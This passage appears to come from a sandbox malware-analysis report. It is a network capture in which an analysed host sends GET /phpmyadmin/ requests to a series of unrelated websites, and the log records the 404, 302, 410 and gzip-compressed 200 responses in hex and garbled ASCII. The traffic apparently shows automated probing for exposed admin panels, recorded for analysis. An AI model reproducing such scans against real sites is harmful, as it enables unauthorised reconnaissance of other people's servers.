                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                79192.168.2.65434369.160.38.280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.429637909 CET224OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.601098061 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                80192.168.2.6544813.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.652585030 CET228OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.840672016 CET346INHTTP/1.1 410 Gone
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 6c 61 2d 6d 6f 72 61 64 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='0; url=http://la-morada.com/' />a </head>8</html>0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                81192.168.2.65435581.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.684830904 CET233OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.878743887 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                82192.168.2.65443985.255.14.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.853936911 CET223OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.074774027 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=j33ddbu2qqtzc0zpcqfcopfc; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzW
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.074827909 CET1340INData Raw: bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: E?z/w]\~=?yz=*oE~_|q^\||?N~g';W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.074841022 CET1340INData Raw: 8d 1e 93 2f 54 2f cc 9f 3e 29 bd df fd 5f e9 37 03 d5 70 21 72 1a 66 5c fe f7 9b f9 50 df 2e ab 8b ca 7e ef a6 ef 2e d0 74 b3 e0 10 a0 3f e8 77 03 84 dc e7 ed 66 b1 7d 90 06 48 fc d8 8f 49 c6 e1 ad c9 38 cc 35 e3 a0 5f df 04 6e df 01 22 84 f4 bb
                                                                                                                                                                                                                                                                                                                Data Ascii: /T/>)_7p!rf\P.~.t?wf}HI85_n"t/UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@L
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.074944973 CET1340INData Raw: 48 c3 40 e8 57 42 4b 20 71 14 43 c4 12 70 ff f8 9f fc 16 0d e9 6f 52 a7 04 94 7e a7 96 0a 39 85 8f 4b 7f 32 78 f9 b5 c9 48 d7 ee 3e 1c 47 c6 87 01 7e 23 d4 0d 07 4e 32 f4 b6 ad ab 65 f1 76 dd 80 c5 0a 0a 2a 48 33 0d f9 7d 45 4a d9 65 fb 02 c6 b6
                                                                                                                                                                                                                                                                                                                Data Ascii: H@WBK qCpoR~9K2xH>G~#N2ev*H3}EJeCGo4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.277626991 CET1340INData Raw: 58 38 81 88 87 e8 9e 45 87 07 e9 27 39 b1 86 fe 8f fe c5 e6 8d d4 4b b4 5a 7e a7 e7 03 3b f9 47 ff 3c fa fb 1f fd ab e5 83 7f f4 2f 66 9d f3 be e0 fd e4 e8 3f fa b7 fe a3 7f 1f 7e ff 3a 70 22 b9 d0 7f f4 6f 6d fe d1 bf 98 82 be af 0f 74 30 ab f3
                                                                                                                                                                                                                                                                                                                Data Ascii: X8E'9KZ~;G</f?~:p"omt0.,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.277641058 CET431INData Raw: ed ea e2 e4 d3 8b 9f fa ee ab cb af de ee ed ff e4 c9 c5 77 76 de af 13 12 dd e9 5b e9 e3 e5 de a4 f9 bd d7 ed ef 73 fe fa 3b 2f 5e 5f 5d 5d 3c 5d fc 60 af 3a de 9e 9e 65 af 7e 62 ef 60 fe fb bf 7c fd fb 2c ef bd 58 fd fe 7b 07 5f f4 fa e0 7f 4c
                                                                                                                                                                                                                                                                                                                Data Ascii: wv[s;/^_]]<]`:e~b`|,X{_LGTth}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                83192.168.2.65443885.255.14.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.853935957 CET223OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.080863953 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=k2sm0jx3poko3igmfawppd3r; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzW
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.080878019 CET1340INData Raw: bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: E?z/w]\~=?yz=*oE~_|q^\||?N~g';W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.080910921 CET1340INData Raw: 8d 1e 93 2f 54 2f cc 9f 3e 29 bd df fd 5f e9 37 03 d5 70 21 72 1a 66 5c fe f7 9b f9 50 df 2e ab 8b ca 7e ef a6 ef 2e d0 74 b3 e0 10 a0 3f e8 77 03 84 dc e7 ed 66 b1 7d 90 06 48 fc d8 8f 49 c6 e1 ad c9 38 cc 35 e3 a0 5f df 04 6e df 01 22 84 f4 bb
                                                                                                                                                                                                                                                                                                                Data Ascii: /T/>)_7p!rf\P.~.t?wf}HI85_n"t/UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@L
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.080924988 CET1340INData Raw: 48 c3 40 e8 57 42 4b 20 71 14 43 c4 12 70 ff f8 9f fc 16 0d e9 6f 52 a7 04 94 7e a7 96 0a 39 85 8f 4b 7f 32 78 f9 b5 c9 48 d7 ee 3e 1c 47 c6 87 01 7e 23 d4 0d 07 4e 32 f4 b6 ad ab 65 f1 76 dd 80 c5 0a 0a 2a 48 33 0d f9 7d 45 4a d9 65 fb 02 c6 b6
                                                                                                                                                                                                                                                                                                                Data Ascii: H@WBK qCpoR~9K2xH>G~#N2ev*H3}EJeCGo4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.283483028 CET1340INData Raw: 58 38 81 88 87 e8 9e 45 87 07 e9 27 39 b1 86 fe 8f fe c5 e6 8d d4 4b b4 5a 7e a7 e7 03 3b f9 47 ff 3c fa fb 1f fd ab e5 83 7f f4 2f 66 9d f3 be e0 fd e4 e8 3f fa b7 fe a3 7f 1f 7e ff 3a 70 22 b9 d0 7f f4 6f 6d fe d1 bf 98 82 be af 0f 74 30 ab f3
                                                                                                                                                                                                                                                                                                                Data Ascii: X8E'9KZ~;G</f?~:p"omt0.,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.283494949 CET431INData Raw: ed ea e2 e4 d3 8b 9f fa ee ab cb af de ee ed ff e4 c9 c5 77 76 de af 13 12 dd e9 5b e9 e3 e5 de a4 f9 bd d7 ed ef 73 fe fa 3b 2f 5e 5f 5d 5d 3c 5d fc 60 af 3a de 9e 9e 65 af 7e 62 ef 60 fe fb bf 7c fd fb 2c ef bd 58 fd fe 7b 07 5f f4 fa e0 7f 4c
                                                                                                                                                                                                                                                                                                                Data Ascii: wv[s;/^_]]<]`:e~b`|,X{_LGTth}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                84192.168.2.654440188.120.236.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.866986036 CET226OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
